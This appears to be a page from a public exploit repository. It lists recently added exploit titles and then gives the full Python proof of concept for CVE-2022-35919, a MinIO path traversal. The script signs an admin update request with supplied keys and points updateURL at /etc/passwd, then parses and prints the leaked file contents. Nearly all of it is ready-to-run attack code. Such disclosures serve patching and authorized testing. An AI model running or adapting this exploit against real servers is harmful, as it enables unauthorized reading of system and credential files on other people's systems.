f3649a641f
24 changes to exploits/shellcodes/ghdb Minio 2022-07-29T19-40-48Z - Path traversal Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service Atcom 2.7.x.x - Authenticated Command Injection Ruijie Reyee Mesh Router - MITM Remote Code Execution (RCE) Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction OpenPLC WebServer 3 - Denial of Service Splunk 9.0.5 - admin account take over BoidCMS v2.0.0 - authenticated file upload vulnerability Cacti 1.2.24 - Authenticated command injection when using SNMP options Chitor-CMS v1.1.2 - Pre-Auth SQL Injection Clcknshop 1.0.0 - SQL Injection Coppermine Gallery 1.6.25 - RCE Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) GLPI GZIP(Py3) 9.4.5 - RCE Limo Booking Software v1.0 - CORS Media Library Assistant Wordpress Plugin - RCE and LFI Online ID Generator 1.0 - Remote Code Execution (RCE) Shuttle-Booking-Software v1.0 - Multiple-SQLi Webedition CMS v2.9.8.8 - Blind SSRF WEBIGniter v28.7.23 File Upload - Remote Code Execution Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation Wordpress Sonaar Music Plugin 4.7 - Stored XSS Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
81 lines
No EOL
3.5 KiB
Python
Executable file
81 lines
No EOL
3.5 KiB
Python
Executable file
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
|
|
# Date: 2023-09-02
|
|
# Exploit Author: Jenson Zhao
|
|
# Vendor Homepage: https://min.io/
|
|
# Software Link: https://github.com/minio/minio/
|
|
# Version: Up to (excluding) 2022-07-29T19-40-48Z
|
|
# Tested on: Windows 10
|
|
# CVE : CVE-2022-35919
|
|
# Required before execution: pip install minio,requests
|
|
import urllib.parse
|
|
import requests, json, re, datetime, argparse
|
|
from minio.credentials import Credentials
|
|
from minio.signer import sign_v4_s3
|
|
|
|
|
|
class MyMinio():
|
|
secure = False
|
|
|
|
def __init__(self, base_url, access_key, secret_key):
|
|
self.credits = Credentials(
|
|
access_key=access_key,
|
|
secret_key=secret_key
|
|
)
|
|
if base_url.startswith('http://') and base_url.endswith('/'):
|
|
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
|
|
elif base_url.startswith('https://') and base_url.endswith('/'):
|
|
self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
|
|
self.secure = True
|
|
else:
|
|
print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
|
|
|
|
def poc(self):
|
|
datetimes = datetime.datetime.utcnow()
|
|
datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
|
|
urls = urllib.parse.urlparse(self.url)
|
|
headers = {
|
|
'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
|
|
'X-Amz-Date': datetime_str,
|
|
'Host': urls.netloc,
|
|
}
|
|
headers = sign_v4_s3(
|
|
method='POST',
|
|
url=urls,
|
|
region='',
|
|
headers=headers,
|
|
credentials=self.credits,
|
|
content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
|
|
date=datetimes,
|
|
)
|
|
if self.secure:
|
|
response = requests.post(url=self.url, headers=headers, verify=False)
|
|
else:
|
|
response = requests.post(url=self.url, headers=headers)
|
|
try:
|
|
message = json.loads(response.text)['Message']
|
|
pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
|
|
matches = re.findall(pattern, message)
|
|
if matches:
|
|
print('There is CVE-2022-35919 problem with the url!')
|
|
print('The contents of the /etc/passwd file are as follows:')
|
|
for match in matches:
|
|
print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
|
|
match[6]))
|
|
else:
|
|
print('There is no CVE-2022-35919 problem with the url!')
|
|
print('Here is the response message content:')
|
|
print(message)
|
|
except Exception as e:
|
|
print(
|
|
'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
|
|
print(response.text)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
|
|
parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
|
|
parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
|
|
args = parser.parse_args()
|
|
minio = MyMinio(args.url, args.accesskey, args.secretkey)
|
|
minio.poc() |